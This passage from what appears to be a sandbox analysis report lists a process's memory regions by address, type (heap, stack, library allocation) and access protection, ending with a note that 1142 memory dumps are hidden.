trusted library allocation
|
page execute and read and write
|
||
1E864980000
|
heap
|
page execute and read and write
|
||
3D0000
|
heap
|
page read and write
|
||
D8B000
|
heap
|
page read and write
|
||
1118000
|
heap
|
page read and write
|
||
196D9C10000
|
heap
|
page read and write
|
||
16D187E7000
|
trusted library allocation
|
page read and write
|
||
16D28A66000
|
trusted library allocation
|
page read and write
|
||
1E864A11000
|
heap
|
page read and write
|
||
53A000
|
heap
|
page read and write
|
||
1B980000
|
heap
|
page read and write
|
||
7FFE7E470000
|
trusted library allocation
|
page read and write
|
||
7FFE7E510000
|
trusted library allocation
|
page read and write
|
||
7FFE7E460000
|
trusted library allocation
|
page read and write
|
||
7FFE7E660000
|
trusted library allocation
|
page read and write
|
||
196D9E36000
|
trusted library allocation
|
page read and write
|
||
7FFE7E470000
|
trusted library allocation
|
page read and write
|
||
1C301783000
|
trusted library allocation
|
page read and write
|
||
7FFE7E2DC000
|
trusted library allocation
|
page execute and read and write
|
||
7FFE7E548000
|
trusted library allocation
|
page read and write
|
||
196DB60A000
|
trusted library allocation
|
page read and write
|
||
7FFE7E1ED000
|
trusted library allocation
|
page execute and read and write
|
||
A52BACC000
|
stack
|
page read and write
|
||
1C301DDD000
|
trusted library allocation
|
page read and write
|
||
1C8C0000
|
heap
|
page read and write
|
||
570000
|
heap
|
page read and write
|
||
16D1A04E000
|
trusted library allocation
|
page read and write
|
||
1B25E000
|
stack
|
page read and write
|
||
1D20E000
|
stack
|
page read and write
|
||
7FFE7E3A0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFE7E290000
|
trusted library allocation
|
page read and write
|
||
7FFE7E21B000
|
trusted library allocation
|
page read and write
|
||
7FFE7E2D0000
|
trusted library allocation
|
page read and write
|
||
196D8079000
|
heap
|
page read and write
|
||
1C300BFF000
|
trusted library allocation
|
page read and write
|
||
196DBB8D000
|
trusted library allocation
|
page read and write
|
||
1C377F27000
|
heap
|
page read and write
|
||
7D0000
|
heap
|
page read and write
|
||
7FFE7E60C000
|
trusted library allocation
|
page read and write
|
||
1E864C50000
|
heap
|
page read and write
|
||
1E84A759000
|
heap
|
page read and write
|
||
1C379D9F000
|
heap
|
page read and write
|
||
1C377E42000
|
heap
|
page read and write
|
||
AAF000
|
stack
|
page read and write
|
||
6B2EBA000
|
stack
|
page read and write
|
||
7FFE7E2BC000
|
trusted library allocation
|
page execute and read and write
|
||
2B5E000
|
stack
|
page read and write
|
||
196D808C000
|
heap
|
page read and write
|
||
196F24E2000
|
heap
|
page read and write
|
||
196D8000000
|
heap
|
page read and write
|
||
196DAED1000
|
trusted library allocation
|
page read and write
|
||
7FFE7E3E0000
|
trusted library allocation
|
page execute and read and write
|
||
16D197F9000
|
trusted library allocation
|
page read and write
|
||
7FFE7E20D000
|
trusted library allocation
|
page execute and read and write
|
||
24C1000
|
trusted library allocation
|
page read and write
|
||
2C70000
|
trusted library allocation
|
page read and write
|
||
196DAF88000
|
trusted library allocation
|
page read and write
|
||
91F7B4C000
|
stack
|
page read and write
|
||
1AECF000
|
stack
|
page read and write
|
||
1B7DE000
|
stack
|
page read and write
|
||
196F24D0000
|
heap
|
page read and write
|
||
196DB533000
|
trusted library allocation
|
page read and write
|
||
7FFE7E690000
|
trusted library allocation
|
page read and write
|
||
7F8000
|
heap
|
page read and write
|
||
1C310031000
|
trusted library allocation
|
page read and write
|
||
7FFE7E39A000
|
trusted library allocation
|
page read and write
|
||
1C301E22000
|
trusted library allocation
|
page read and write
|
||
7FFE7E4A0000
|
trusted library allocation
|
page read and write
|
||
196F2639000
|
heap
|
page read and write
|
||
7FFE7E640000
|
trusted library allocation
|
page read and write
|
||
1C377CB0000
|
heap
|
page read and write
|
||
7FFE7E210000
|
trusted library allocation
|
page read and write
|
||
196DB6A2000
|
trusted library allocation
|
page read and write
|
||
196DB173000
|
trusted library allocation
|
page read and write
|
||
7FFE7E1ED000
|
trusted library allocation
|
page execute and read and write
|
||
1E84DB7A000
|
trusted library allocation
|
page read and write
|
||
2340000
|
heap
|
page execute and read and write
|
||
196F2601000
|
heap
|
page read and write
|
||
7FFE7E305000
|
trusted library allocation
|
page execute and read and write
|
||
196EA095000
|
trusted library allocation
|
page read and write
|
||
DCD000
|
heap
|
page read and write
|
||
16D30FF9000
|
heap
|
page read and write
|
||
7FFE7E20D000
|
trusted library allocation
|
page execute and read and write
|
||
16D19973000
|
trusted library allocation
|
page read and write
|
||
196D8040000
|
heap
|
page read and write
|
||
7FFE7E3E0000
|
trusted library allocation
|
page read and write
|
||
16D16C3C000
|
heap
|
page read and write
|
||
1C379EF6000
|
heap
|
page execute and read and write
|
||
7FFE7E23C000
|
trusted library allocation
|
page execute and read and write
|
||
2C42000
|
trusted library allocation
|
page read and write
|
||
7FFE7E214000
|
trusted library allocation
|
page read and write
|
||
1B4D3000
|
heap
|
page read and write
|
||
7FFE7E232000
|
trusted library allocation
|
page read and write
|
||
D10000
|
heap
|
page read and write
|
||
A52ACFF000
|
stack
|
page read and write
|
||
7FFE7E430000
|
trusted library allocation
|
page read and write
|
||
1C379EF0000
|
heap
|
page execute and read and write
|
||
1B05E000
|
stack
|
page read and write
|
||
7FFE7E3F4000
|
trusted library allocation
|
page read and write
|
||
2F9D000
|
trusted library allocation
|
page read and write
|
||
1E84C160000
|
heap
|
page execute and read and write
|
||
15B5879000
|
stack
|
page read and write
|
||
1C379840000
|
heap
|
page read and write
|
||
7FFE7E603000
|
trusted library allocation
|
page read and write
|
||
7DF43E420000
|
trusted library allocation
|
page execute and read and write
|
||
568000
|
heap
|
page read and write
|
||
7FFE7E5E0000
|
trusted library allocation
|
page read and write
|
||
7FFE7E1F3000
|
trusted library allocation
|
page execute and read and write
|
||
7FFE7E202000
|
trusted library allocation
|
page read and write
|
||
1240000
|
heap
|
page execute and read and write
|
||
7FFE7E220000
|
trusted library allocation
|
page read and write
|
||
7FFE7E640000
|
trusted library allocation
|
page read and write
|
||
645000
|
heap
|
page read and write
|
||
11C9000
|
heap
|
page read and write
|
||
16D18761000
|
trusted library allocation
|
page read and write
|
||
6B2C77000
|
stack
|
page read and write
|
||
1E84C81D000
|
trusted library allocation
|
page read and write
|
||
1B09E000
|
stack
|
page read and write
|
||
1C8D0000
|
heap
|
page read and write
|
||
15B59F7000
|
stack
|
page read and write
|
||
91F6B7D000
|
stack
|
page read and write
|
||
1E864807000
|
heap
|
page execute and read and write
|
||
196EA09A000
|
trusted library allocation
|
page read and write
|
||
7FFE7E224000
|
trusted library allocation
|
page read and write
|
||
196F21CE000
|
heap
|
page read and write
|
||
7FFE7E560000
|
trusted library allocation
|
page read and write
|
||
196DB369000
|
trusted library allocation
|
page read and write
|
||
B95000
|
heap
|
page read and write
|
||
1E84D0CE000
|
trusted library allocation
|
page read and write
|
||
1C379700000
|
trusted library allocation
|
page read and write
|
||
1E8649BC000
|
heap
|
page read and write
|
||
9F0000
|
heap
|
page read and write
|
||
7FFE7E460000
|
trusted library allocation
|
page read and write
|
||
12B61000
|
trusted library allocation
|
page read and write
|
||
7FFE7E340000
|
trusted library allocation
|
page execute and read and write
|
||
7FFE7E310000
|
trusted library allocation
|
page execute and read and write
|
||
196D809C000
|
heap
|
page read and write
|
||
7FFE7E24C000
|
trusted library allocation
|
page execute and read and write
|
||
1E84D70F000
|
trusted library allocation
|
page read and write
|
||
7FFE7E54C000
|
trusted library allocation
|
page read and write
|
||
1ADC0000
|
heap
|
page execute and read and write
|
||
7FFE7E1E0000
|
trusted library allocation
|
page read and write
|
||
91F7A4A000
|
stack
|
page read and write
|
||
1C301950000
|
trusted library allocation
|
page read and write
|
||
16D28A4E000
|
trusted library allocation
|
page read and write
|
||
7FFE7E2D6000
|
trusted library allocation
|
page execute and read and write
|
||
15B694E000
|
stack
|
page read and write
|
||
616000
|
heap
|
page read and write
|
||
7FFE7E534000
|
trusted library allocation
|
page read and write
|
||
1AA4D000
|
stack
|
page read and write
|
||
7FFE7E2C6000
|
trusted library allocation
|
page execute and read and write
|
||
1C301214000
|
trusted library allocation
|
page read and write
|
||
1E864AF8000
|
heap
|
page read and write
|
||
24CC000
|
trusted library allocation
|
page read and write
|
||
1E8646E0000
|
heap
|
page read and write
|
||
1E864A21000
|
heap
|
page read and write
|
||
7FFE7E220000
|
trusted library allocation
|
page read and write
|
||
7FFE7E1F3000
|
trusted library allocation
|
page execute and read and write
|
||
91F6BF9000
|
stack
|
page read and write
|
||
1E864B34000
|
heap
|
page read and write
|
||
7FFE7E460000
|
trusted library allocation
|
page read and write
|
||
1E864780000
|
heap
|
page read and write
|
||
1C01D000
|
stack
|
page read and write
|
||
7FFE7E560000
|
trusted library allocation
|
page read and write
|
||
1C379845000
|
heap
|
page read and write
|
||
1E85C634000
|
trusted library allocation
|
page read and write
|
||
7FFE7E306000
|
trusted library allocation
|
page execute and read and write
|
||
196D8395000
|
heap
|
page read and write
|
||
91F697E000
|
stack
|
page read and write
|
||
1E85C63B000
|
trusted library allocation
|
page read and write
|
||
7FFE7E1FD000
|
trusted library allocation
|
page execute and read and write
|
||
895000
|
heap
|
page read and write
|
||
2451000
|
trusted library allocation
|
page read and write
|
||
A52BB4B000
|
stack
|
page read and write
|
||
196D808A000
|
heap
|
page read and write
|
||
650000
|
heap
|
page read and write
|
||
196D9D50000
|
heap
|
page execute and read and write
|
||
6F1000
|
stack
|
page read and write
|
||
7FFE7E27C000
|
trusted library allocation
|
page execute and read and write
|
||
15B53BE000
|
stack
|
page read and write
|
||
1C37A178000
|
heap
|
page read and write
|
||
930000
|
trusted library allocation
|
page read and write
|
||
1490000
|
trusted library allocation
|
page read and write
|
||
1B9E0000
|
heap
|
page read and write
|
||
8A5000
|
heap
|
page read and write
|
||
7FFE7E234000
|
trusted library allocation
|
page read and write
|
||
7FFE7E600000
|
trusted library allocation
|
page execute and read and write
|
||
1C1B5000
|
stack
|
page read and write
|
||
16D30C30000
|
heap
|
page read and write
|
||
1C37A037000
|
heap
|
page read and write
|
||
7FFE7E200000
|
trusted library allocation
|
page read and write
|
||
6B303E000
|
stack
|
page read and write
|
||
7FFE7E23D000
|
trusted library allocation
|
page execute and read and write
|
||
1C377E00000
|
heap
|
page read and write
|
||
235F000
|
trusted library allocation
|
page read and write
|
||
15B5CFC000
|
stack
|
page read and write
|
||
15B67CE000
|
stack
|
page read and write
|
||
7FFE7E550000
|
trusted library allocation
|
page read and write
|
||
2F9F000
|
trusted library allocation
|
page read and write
|
||
2170000
|
heap
|
page read and write
|
||
6B3C89000
|
stack
|
page read and write
|
||
1E84A76D000
|
heap
|
page read and write
|
||
16D16C43000
|
heap
|
page read and write
|
||
2CBB000
|
trusted library allocation
|
page read and write
|
||
196DB644000
|
trusted library allocation
|
page read and write
|
||
7FFE7E637000
|
trusted library allocation
|
page read and write
|
||
7FFE7E23D000
|
trusted library allocation
|
page execute and read and write
|
||
16D191B3000
|
trusted library allocation
|
page read and write
|
||
1D30C000
|
stack
|
page read and write
|
||
7FFE7E223000
|
trusted library allocation
|
page execute and read and write
|
||
8A0000
|
heap
|
page read and write
|
||
16D1993A000
|
trusted library allocation
|
page read and write
|
||
7FFE7E400000
|
trusted library allocation
|
page read and write
|
||
15B56FF000
|
stack
|
page read and write
|
||
7FFE7E21D000
|
trusted library allocation
|
page execute and read and write
|
||
1E8646F2000
|
heap
|
page read and write
|
There are 1142 hidden memdumps, click here to show them.